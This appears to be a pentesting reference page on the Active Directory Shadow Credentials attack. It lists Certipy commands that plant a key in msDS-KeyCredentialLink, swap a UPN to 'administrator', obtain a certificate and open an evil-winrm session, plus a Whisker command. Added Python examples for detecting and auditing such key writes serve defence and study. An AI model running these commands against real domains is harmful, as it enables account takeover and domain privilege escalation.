
Shadow Credentials

Last modified: 2025-03-15

Shadow Credentials is an attack technique for taking over an Active Directory user or computer account by writing attacker-controlled key material into the msDS-KeyCredentialLink attribute of the target object.

Exploit

If an attacker can modify the msDS-KeyCredentialLink attribute of a target object (a user or computer account) and append alternate credentials to it in the form of a certificate/public key pair, they can authenticate as that account (via PKINIT) and take it over in AD.

Using Certipy

# 1. Add a shadow certificate for the target user account
certipy shadow auto -u <user>@<target-ip> -hashes <nt-hash-of-user> -account <target-user>

# 2. Update the target account's UPN (User Principal Name) to "administrator"
certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> -user <target-user> -upn administrator

# (Optional) Find vulnerable templates (note the values of 'Template Name' and 'Certificate Authorities'; they are used in the later commands)
certipy find -u <ca>@<target-ip> -hashes <nt-hash-of-ca> -stdout -vulnerable

# 3. Request a certificate for the target account using a vulnerable CA template
certipy req -u <target-user>@<target-ip> -hashes <nt-hash-of-target-user> -ca <ca> -template <template>

# 4. Restore the target account's UPN to its original value
certipy account update -u <user>@<target-ip> -hashes <nt-hash-of-user> -user <target-user> -upn <target-user>@<target-ip>

# 5. Authenticate as the administrator using the obtained PFX certificate
certipy auth -pfx administrator.pfx -domain "example.local"

# 6. Establish a remote WinRM session as the administrator using their NTLM hash
evil-winrm -i <target-ip> -u administrator -H <nt-hash-of-administrator>
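Every step of the sequence above begins with a write to msDS-KeyCredentialLink, which Windows records as Security event 5136 (directory service object modified) once Directory Service Changes auditing and a SACL on the attribute are in place. The following detection logic is an added example, not part of this page and not part of Certipy: it parses 5136 event XML and flags writes where the subject is neither the object itself (normal Windows Hello for Business self-enrolment) nor an allow-listed provisioning identity. The event samples, account names and the `svc_keyprov` allow-list entry are constructed for the example.

```python
"""Flag writes to msDS-KeyCredentialLink in Windows Security event 5136.
Added example; not part of the original page or of Certipy."""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# 5136 OperationType resource strings
OPERATIONS = {"%%14674": "Value Added", "%%14675": "Value Deleted"}


def parse_event(xml_text):
    """Return the EventData fields of a 5136 event as a dict, or None for other IDs."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "5136":
        return None
    return {d.get("Name"): (d.text or "").strip()
            for d in root.findall("e:EventData/e:Data", NS)}


def _account_from_dn(dn):
    """Take the leading CN of an object DN as its account name."""
    match = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return match.group(1).lower() if match else ""


def _normalize(name):
    """Compare names case-insensitively, ignoring a computer account's trailing $."""
    return name.lower().rstrip("$")


def assess(event, allowlist):
    """Return a finding when an account other than the object itself, and not an
    allow-listed provisioning identity, changes msDS-KeyCredentialLink."""
    if not event or event.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
        return None
    subject = _normalize(event.get("SubjectUserName", ""))
    target = _account_from_dn(event.get("ObjectDN", ""))
    if subject in {_normalize(a) for a in allowlist}:
        return None  # e.g. the service account that provisions device keys
    if subject == target:
        return None  # an account registering a key on itself is expected
    return {
        "subject": event.get("SubjectUserName"),
        "object": event.get("ObjectDN"),
        "operation": OPERATIONS.get(event.get("OperationType"), event.get("OperationType")),
    }


def find_suspicious(xml_events, allowlist=()):
    """Run assess() over a batch of event XML strings and keep the findings."""
    findings = [assess(parse_event(x), allowlist) for x in xml_events]
    return [f for f in findings if f]


def _sample(subject, object_dn, op):
    """Build a minimal 5136 event; constructed for this example."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>5136</EventID></System>
  <EventData>
    <Data Name="SubjectUserName">{subject}</Data>
    <Data Name="ObjectDN">{object_dn}</Data>
    <Data Name="AttributeLDAPDisplayName">msDS-KeyCredentialLink</Data>
    <Data Name="OperationType">{op}</Data>
  </EventData>
</Event>"""


# Constructed sample events (account names and DNs are invented for the example)
SAMPLE_EVENTS = [
    _sample("jdoe", "CN=jdoe,OU=Users,DC=example,DC=local", "%%14674"),          # self-enrolment
    _sample("jdoe", "CN=SRV01,OU=Servers,DC=example,DC=local", "%%14674"),       # user keys another object
    _sample("svc_keyprov", "CN=alice,OU=Users,DC=example,DC=local", "%%14674"),  # allow-listed provisioner
    _sample("WS02$", "CN=SRV01,OU=Servers,DC=example,DC=local", "%%14674"),      # one machine keys another
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_EVENTS, allowlist=["svc_keyprov"]):
        print(finding)
```

The allow-list should hold only the identities that legitimately write this attribute in your forest (key provisioning and hybrid-join synchronisation accounts); a subsequent 4768 (TGT request) for the same account with certificate information populated corroborates that the added key was actually used.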

Using Whisker

Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute.

Whisker.exe add /target:john /domain:example.local
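What Whisker appends to the attribute is a DN-with-Binary value whose binary part is a KEYCREDENTIALLINK_BLOB (MS-ADTS section 2.2.20): a 4-byte version followed by length/identifier/value entries such as KeyID, KeyUsage, KeySource, DeviceId and KeyCreationTime. Decoding those entries lets a defender inventory every key registered on an account and compare it against the devices that are expected to hold one. The decoder below is an added example written for this page, not Whisker's code; the two sample values, the device GUIDs and the `KNOWN_DEVICES` inventory are constructed, and the encoder helpers exist only to build that sample.

```python
"""Decode msDS-KeyCredentialLink values and flag keys from unexpected devices.
Added example, not part of the original page or of Whisker."""
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Entry identifiers from MS-ADTS 2.2.20.2
ENTRY_NAMES = {
    0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
    0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
    0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime",
}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(raw):
    """FILETIME is 100 ns ticks since 1601-01-01 UTC, little-endian 64-bit."""
    ticks, = struct.unpack("<Q", raw)
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_dn_with_binary(value):
    """DN-with-Binary syntax: B:<count of hex chars>:<hex>:<DN>."""
    parts = value.split(":", 3)
    if len(parts) != 4 or parts[0] != "B" or int(parts[1]) != len(parts[2]):
        raise ValueError("not a well-formed DN-with-Binary value")
    return bytes.fromhex(parts[2]), parts[3]


def parse_key_credential(blob):
    """Walk the KEYCREDENTIALLINK_BLOB entries and decode the ones with known types."""
    version, = struct.unpack_from("<I", blob, 0)
    if version != 0x200:
        raise ValueError(f"unsupported KeyCredentialLink version {version:#x}")
    entries, offset = {}, 4
    while offset + 3 <= len(blob):
        length, ident = struct.unpack_from("<HB", blob, offset)
        offset += 3
        value = blob[offset:offset + length]
        if len(value) != length:
            raise ValueError("truncated entry")
        offset += length
        name = ENTRY_NAMES.get(ident, f"Unknown({ident:#x})")
        if ident == 0x06:
            entries[name] = str(uuid.UUID(bytes_le=value))  # GUID in COM byte order
        elif ident in (0x08, 0x09):
            entries[name] = filetime_to_datetime(value)
        elif ident in (0x04, 0x05):
            entries[name] = value[0]
        else:
            entries[name] = value.hex()
    return entries


def audit_account(sam_account_name, link_values, known_devices):
    """One finding per key whose DeviceId is not in the inventory for this account."""
    findings = []
    for value in link_values:
        blob, dn = parse_dn_with_binary(value)
        key = parse_key_credential(blob)
        device = key.get("DeviceId")
        if device not in known_devices.get(sam_account_name, set()):
            findings.append({"account": sam_account_name, "dn": dn, "device_id": device,
                             "key_id": key.get("KeyID"), "created": key.get("KeyCreationTime")})
    return findings


# --- Constructed sample data (encoder helpers used only to build it) ---
def _entry(ident, value):
    return struct.pack("<HB", len(value), ident) + value


def _filetime(dt):
    return struct.pack("<Q", int((dt - FILETIME_EPOCH).total_seconds()) * 10_000_000)


def _blob(key_id_byte, device_id, created):
    return (struct.pack("<I", 0x200)
            + _entry(0x01, bytes([key_id_byte]) * 32)       # KeyID (SHA-256 of key material)
            + _entry(0x04, b"\x01")                          # KeyUsage: NGC
            + _entry(0x05, b"\x00")                          # KeySource: AD
            + _entry(0x06, uuid.UUID(device_id).bytes_le)    # DeviceId
            + _entry(0x09, _filetime(created)))              # KeyCreationTime


def _dn_binary(blob, dn):
    hexed = blob.hex()
    return f"B:{len(hexed)}:{hexed}:{dn}"


KNOWN_DEVICE = "3b9f2a6e-1c44-4f0a-9d2e-0f7b5c8a1e21"     # invented GUID of an enrolled laptop
UNKNOWN_DEVICE = "c0ffee12-7d1a-4b8e-a5d3-61a9f0e4b2c7"   # invented GUID never enrolled
KNOWN_DEVICES = {"jdoe": {KNOWN_DEVICE}}
_DN = "CN=jdoe,OU=Users,DC=example,DC=local"
SAMPLE_VALUES = [
    _dn_binary(_blob(0x11, KNOWN_DEVICE, datetime(2024, 6, 1, tzinfo=timezone.utc)), _DN),
    _dn_binary(_blob(0x22, UNKNOWN_DEVICE, datetime(2025, 3, 15, tzinfo=timezone.utc)), _DN),
]

if __name__ == "__main__":
    for finding in audit_account("jdoe", SAMPLE_VALUES, KNOWN_DEVICES):
        print(finding)
```

Running the audit over `msDS-KeyCredentialLink` values exported from AD (for example with an LDAP query that returns the attribute as a string) gives a per-account list of key identifiers, device GUIDs and creation times; keys on accounts that should have none at all, or whose device is not in the enrolment inventory, are the ones to investigate and remove.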